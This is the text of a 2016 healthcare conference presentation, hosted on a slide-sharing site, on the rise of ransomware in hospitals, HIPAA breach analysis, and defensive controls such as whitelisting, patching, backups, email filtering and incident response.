The Rise of Ransomware PowerPoint Presentation, PPT - DocSlides

The Rise of Ransomware PowerPoint Presentation, PPT - DocSlides

2017-04-20 54K 54 0 0

Description

in Healthcare:. New Threats, Old Solutions. Chuck Kesler – CISO, Duke Health. Jon Sternstein – Stern security. 22. nd. NCHICA Annual. Conference. August 2016. Introductions. Chuck Kesler. Chief Information Security Officer, Duke Health. ID: 539754

Direct Link: Embed code:

Download this presentation

DownloadNote - The PPT/PDF document "The Rise of Ransomware" is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.

Presentations text content in The Rise of Ransomware

Slide1

The Rise of Ransomwarein Healthcare:New Threats, Old Solutions

Chuck Kesler – CISO, Duke HealthJon Sternstein – Stern security

22

nd

NCHICA Annual

Conference

August 2016

Slide2

Introductions

Chuck KeslerChief Information Security Officer, Duke HealthPrior to Duke, led Symantec’s Security Advisory Services team in the USNCHICA Board Member30 years of IT technical and management experience

Slide3

Introductions

Jon SternsteinFounder & Principal Consultant at Stern SecurityFormer Healthcare Security OfficerCo-chair of NCHICA Security WorkgroupSANS Institute – MentorSANS 560: Network Penetration Testing and Ethical Hacking

Slide4

Agenda

Overview of the ransomware threat in healthcareAnatomy of an attackApplying old solutions to this new problemIs it a breach?

Slide5

What is ransomware?

Malware that extorts a user or organization by encrypting files until a ransom is paidVariants have been observed for several years, but are becoming increasingly sophisticatedThe ransoms demanded may range from a few hundred to thousands of dollars, and often must be paid in BitcoinAccess is usually restored after the ransom is paid

Slide6

Ransomware Isn’t New

In 2012, a Symantec report estimated that a single ransomware command & control server could yield $33,600 per day in ransomsIn 2014, the Town of Greenland, New Hampshire had an ransomware attack that resulted in the loss of 8 years worth of electronic records In 2015, the FBI received more than 2,400 ransomware complaints, which totaled $25M in damagesIndividuals are also being targeted

Slide7

How do these infectionsoccur?

Phishing (link clicks and attachments)Drive-by-downloads (e.g. from malicious advertisements)Web server vulnerabilitiesCommon denominators:missing patches, poor access controls

7

Slide8

Why is ransomware so effective?

Organizations that aren’t prepared to respond are intimidated into taking quick and possibly rash actionInability to contain a spreading attack forces systems to be taken offlineLack of good backups and contingency plans forces organizations to consider paying ransomsSometimes, even the backups have been compromised

8

Slide9

Healthcare in thecrosshairs

Hollywood PresbyterianMedStarKentucky Methodist HospitalChino Valley Medical CenterDesert Valley HospitalAlvarado Hospital Medical CenterKing’s Daughters’ Health

9

HealthcareIT

News Survey of Hospitals: How many ransomware attacks have targeted your organization in the last 12 months? 75% have had at least one.

Slide10

EVOLVING RANSOMWARE THREATS

Spreading via server vulnerabilities (MedStar)Attackers using 0-day vulnerabilitiesPotential for a coordinated, time-delayed attackPotential for data breach

Slide11

So, is it a breach?

Slide12

IS It a Breach?

HHS recently released guidance that provides guidelines for ransomware breach analysis and reporting:http://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf“Part of a deeper analysis should involve assessing whether or not there was a breach of PHI as a result of the security incident. The presence of ransomware (or any malware) is a security incident under HIPAA that may also result in an impermissible disclosure of PHI in violation of the Privacy Rule and a breach, depending on the facts and circumstances of the attack.”

Slide13

IS It a Breach?

“When electronic protected health information (ePHI) is encrypted as the result of a ransomware attack, a breach has occurred because the ePHI encrypted by the ransomware was acquired (i.e., unauthorizedindividuals have taken possession or control of the information), and thus is a “disclosure” not permitted under the HIPAA Privacy Rule.Unless the covered entity or business associate can demonstrate that there is a “...low probability that the PHI has been compromised,” based on the factors set forth in the Breach Notification Rule, a breach of PHI is presumed to have occurred. The entity must then comply with the applicable breach notification provisions…”

Slide14

IS It a Breach?

Some considerations for a Ransomware breach analysis:What ransomware variant was involved?Does that variant have a history of data exfiltration?If a new variant, work with security researchers to determine its behaviorLook at network logs and file access audit trails to determine if there is evidence of data exfiltrationAlso consider the impact to data integrity and availabilityThoroughly document your findings

Slide15

Anatomy of an Attack

Slide16

Ransomware in healthcare

Methodist Hospital (Kentucky)Declared State of EmergencyShut down all workstationsAttackers demanded $1600 (4 bitcoins)Back to paper for 5 days

Slide17

Ransomware in healthcare

Hollywood Presbyterian Medical CenterPaid $17,000 (40 bitcoins) to regain accessSystems were down for 10 daysBack to paper recordsSome patients redirected to other hospitals

Slide18

Technical Analysis

Technical overviewDeliveryExecutionEncryptionPaymentDecryption

Slide19

Malicious Document

InfectionEnabling Macros = InfectionRuns in memoryGrabs complete malware from InternetDeletes traces of itself

Slide20

Malicious Communication

CommunicationConnects to Command & Control using a Domain Generation AlgorithmExample: On August 29th, 2016 use YYISIEJAOOO.COMGets Encryption KeysDetermines CostGets Ransom Note

Slide21

Malicious activity

ExecutionDeletes Volume Shadow CopiesAdds itself to StartupEncrypts filesEncrypts network sharesDelivers Ransom Note

Slide22

To Pay or not to Pay

BitcoinsAnonymous PaymentBuy Bitcoin @ CoinbaseReceive decryption softwareMust purchase for each infected machineWill you get your files back?

Slide23

Ransomware in healthcare

Kansas Heart HospitalMay 2016Paid ransom, but didn’t get decryption keysMalware authors demanded second paymentHospital refused to pay second ransom

Slide24

Ransomware breaches

Encrypts and Steals DataChimera Ransomware - 2015Crysis Ransomware - 2016Reportable Breach

Slide25

Ransomware spreads

It’s not just Windows anymore! Official “Transmission” BitTorrent client for Macs was infectedSigned with valid certificateApple revoked certificate

Slide26

Ransomware Malvertising

March 2016Affected sites: MSN, BBC.com, the New York Times, AOL, Newsweek and more.Malicious advertisementsCriminal acquired ad domains after they expired

Slide27

Old Solutions for New Problems

Slide28

Solutions

Implement Security Best PracticesNothing new here – same practices apply to ransomwareBasic concepts: protect, detect, respond, and recoverSANS 20 Critical Security Controls https://www.sans.org/critical-security-controls

Slide29

Protect

Application WhitelistingCan completely prevent ransomwareOnly allow known good applicationsCaveat: you have to know what apps you want to allow, which can be difficult in a dynamic environment

Slide30

Protect

Patching – operating systems, Office, Adobe, browsers, etc.Remove unnecessary softwareWeb filteringBlock suspicious attachmentsBlock/whitelist Office macrosNetwork share access controls – minimize write permissions!Much more…

Slide31

Protect

Backup Important FilesMust test data recoveryHIPAA requirementData backup plan (R) § 164.308(a)(7)(ii)(A)Data backup and storage (A) § 164.310(d)(2)(iv)

Slide32

Detect & Respond

Intrusion detection & preventionIdentify potential ”command & control” communicationsAutomatically drop traffic to known bad actorsNeed 24x7x365 coverage for monitoring and response, which can be a huge challenge for smaller organizations

Slide33

Detect & ResPond

Awareness – don’t forget about Layer 8!Make sure users and IT personnel can recognize the signs of a ransomware attack and know what to do if one occursSuccessfully containing a ransomware attack hinges on quick recognition and reporting of the issue

Slide34

Respond & Recover

Be prepared!Assume the worst may happenHave cybersecurity insurance in placeIdentify those who need to be involved in managing a significant incidentPractice with tabletop exercisesDecide and document how decisions will be made about paying ransomsHave a Bitcoin account readyKnow your local FBI and law enforcement contactsReport ransomware attacks to the FBI via www.ic3.gov

Slide35

Respond & Recover

Basic steps for incident response still apply for ransomware:Contain the spread of the ransomwareEradicate the ransomware from affected systemsRestore affected systems and data to return to normal operationsPerform a post-incident review, including breach analysisDocument lessons learned and implement improvements

Slide36

Help! We have Ransomware… Now What?!

Slide37

Ransomware Help

Home SolutionsPCCryptoPrevent softwareMac - Application Whitelisting: Google’s Santa Project - Firewall: Little Snitch

Slide38

RansomWare Help

NoMoreRansom.orgMaster ListLists ways to decrypt files (if available)https://goo.gl/VnAjsn

Slide39

Q&A

Slide40

References and Backup Slides

Slide41

references

Methodist Hospital Declares State of Emergencyhttp://krebsonsecurity.com/2016/03/hospital-declares-internet-state-of-emergency-after-ransomware-infection/Hollywood Presbyterian Medical Center pays ransomhttp://www.computerworld.com/article/3034736/security/hospital-pays-17k-ransom-to-get-back-access-to-encrypted-files.htmlhttp://www.theregister.co.uk/2016/02/18/la_hospital_bitcoins/http://arstechnica.com/security/2016/02/hospital-pays-17k-for-ransomware-crypto-key/Kansas Heart Hospital asked to pay two ransomshttp://www.networkworld.com/article/3073495/security/kansas-heart-hospital-hit-with-ransomware-paid-but-attackers-demanded-2nd-ransom.htmlMalicious Advertisements on major news siteshttp://www.bbc.com/news/technology-35821276Evolution of ransomwarehttp://arstechnica.com/security/2016/04/ok-panic-newly-evolved-ransomware-is-bad-news-for-everyoneBrian Krebs – Krebs on Security bloghttp://krebsonsecurity.com/tag/ransomware/Google’s Santa Projecthttps://github.com/google/santa

Slide42

references

Ransomware that encrypts and Steals Data – Crysishttps://www.eset.com/us/resources/detail/new-ransomware-threat-crysis-lays-claim-to-teslacrypt-s-former-turf/Ransomware Master Listhttps://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml#Ransomware Prevention Tipshttps://sternsecurity.com/blog/ransomware-prevention-tipsThe Complete Ransomware Guidehttps://blog.varonis.com/the-complete-ransomware-guideUS CERT advisoryhttps://www.us-cert.gov/ncas/alerts/TA16-091ASamSamhttp://blog.talosintel.com/2016/03/samsam-ransomware.htmlRansomware exploiting Jboss vulnerabilitieshttp://www.deependresearch.org/2016/04/jboss-exploits-view-from-victim.htmlLockyhttps://nakedsecurity.sophos.com/2016/02/17/locky-ransomware-what-you-need-to-know/CryptoPreventhttps://www.foolishit.com/cryptoprevent-malware-prevention/

Slide43

Protect

Endpoint ProtectionStarts traditional signature-based anti-virus, but much moreAlso validate files with behavioral and reputational techniquesHost-based firewalling and intrusion detection/preventionMany endpoint protection features may not be enabled by default – enable them!Won’t prevent, but can help contain and eradicate a ransomware attack

Slide44

Protect

PatchingCritical operating system patches (yes, Mac & Linux too!)Web serversWeb browsersOffice applicationsFlash, Silverlight, Quicktime, and other similar browser pluginsExtra credit: remove Flash, Silverlight, etc. if not needed, or consider using plugins that selectively block ads and Flash content

Slide45

Protect

Email FilteringSpam controlURL re-writingVirus scanningBlock suspicious attachments: .exe, .jar, .scr, .bat, .aru, .cmd, .vbs, .7z,.ex, .ex_, .ex1, .pif, .application, .gadget, .com, .hta, .cpl, .msc, .vb, .vbe, .js, .jse, .ws, .wsf, .wsc, .wsh, .ps1, .ps1xml, .ps2, .ps2xml, .psc1, .psc2, .scf, .lnk, .inf, .reg, .docm, .dotm, .xlsm, .xltm, .xlam, .pptm, .potm, .ppam, .ppsm, .sldm, .msi, .msp, .mst

Slide46

Protect

Limit permissions on network sharesEnsure that only those who need access to shares have accessWrite permissions should be strictly limitedDiscontinue the use of any world-writeable shares!Keep in mind that ransomware can affect cloud-based file sharing services too

Slide47

Protect

Network segmentationAvoid flat internal networksCreate zones where systems with similar security profiles are groupedRequire traffic between zones to flow through firewallsMonitor for malicious traffic between zonesImplement using Virtual Routing and Forwarding (VRF) technologyCaveat: requires sophisticated network engineering and knowledge of application data flows


About DocSlides
DocSlides allows users to easily upload and share presentations, PDF documents, and images.Share your documents with the world , watch,share and upload any time you want. How can you benefit from using DocSlides? DocSlides consists documents from individuals and organizations on topics ranging from technology and business to travel, health, and education. Find and search for what interests you, and learn from people and more. You can also download DocSlides to read or reference later.